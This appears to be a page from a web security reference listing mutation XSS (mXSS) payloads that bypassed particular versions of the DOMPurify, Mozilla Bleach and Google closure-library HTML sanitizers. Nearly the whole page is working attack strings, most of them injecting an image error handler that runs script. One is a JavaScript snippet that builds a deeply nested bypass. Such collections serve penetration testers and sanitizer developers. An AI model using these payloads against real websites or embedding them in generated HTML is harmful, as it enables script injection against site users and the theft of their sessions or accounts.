XSS

mXSS

/ Payload examples

This page contains some examples of payloads used to bypass sanitizers in the past. There are many other examples but to avoid redundancy we will add only ones that include new vectors or techniques.

DomPurify

Version

Payload

Credit

Additional links

2.0.0

<svg></p><style><a id="</style><img src=1 onerror=alert(1)>">

2.0.17

<form><math><mtext></form><form><mglyph><style></math><img src onerror=alert(1)>

2.0.17

<math><mtext><table><mglyph><style></mglyph><img&Tab;src=1&Tab;onerror=alert(1)>">

2.0.17

<math><mtext><table><mglyph><style><math><table id=”</table>”><img src onerror=alert(1)”>

2.2.0

<form><math><mtext></form><form><mglyph><svg><mtext><style><path id="</style><img onerror=alert(1) src>">

2.2.3

<svg><xss><desc><noscript></noscript></desc><p></p><style><a title="</style><img src onerror=alert(1)>">

3.0.8

<svg><annotation-xml><foreignobject><style><img src='x' onerror='alert(1)'>">

3.1.0

n = 506; var payload = `${"<div>".repeat(n)}<table id="outer"><caption id="outer"><svg><desc><table id="inner"><caption id="inner"></caption></table></desc><style><a title="</style><img src onerror=alert(1)>"></a></style></svg></caption></table>${"</div>".repeat(n)}`;

N/A

3.1.7

<svg><a><foreignobject><a><table><a></table><style><!--</style></svg><a id="-><img src onerror=alert(1)>">.

Mozilla Bleach

Version

Payload

Credit

Additional links

3.1.0

<noscript><style></noscript><img src=x onerror=alert(1)>

3.1.1

<svg><style><img src=x onerror=alert(1)>

3.2.3

<math><p></p><style></style></math>

Google closure-library

Version

Payload

Credit

Additional links

v20190215

<noscript><p title="</noscript><img src=x onerror=alert(1)>">

PreviousCustom compiled files

Last updated 3 months ago